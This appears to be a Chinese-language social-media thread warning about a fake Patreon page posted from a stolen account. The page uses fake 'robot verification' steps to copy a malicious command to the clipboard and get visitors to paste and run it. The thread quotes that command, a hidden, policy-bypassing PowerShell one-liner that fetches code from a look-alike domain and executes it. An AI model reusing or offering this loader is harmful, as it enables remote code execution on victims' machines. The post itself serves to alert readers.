夢改@復健
6 days ago
小虫被盜的帳號發的假Patreon網站,進去後要求執行兩次機器人驗證,第一次點了後就會自動複製惡意執行代碼到剪貼簿,第二次要求你用快捷鍵開啟檔案總管跟貼上執行....這麼搞剛要中招真的只能騙不懂電腦又愛亂按的人吧
latest #6
夢改@復健
6 days ago
不過點了網頁就自動複製代碼這點,有時候沒注意可能就會不小心中招,還是得多提防點
夢改@復健
6 days ago
pOwErShelL -NoP -NonI -EP Bypass /w h -C $p123=(iwr "https://patreon.mushi024... -Method POST);$tem=[scriptblock]::Create($p123.Content);$tem.InvokeReturnAsIs()
夢改@復健
6 days ago
惡意代碼長這樣
立即下載
夢改@復健
6 days ago
應該是要求powershell跳過環境設定並且用管理者權限,無視窗執行從假網站發出的其他代碼
如果精蟲衝腦的話很容易中招
back to top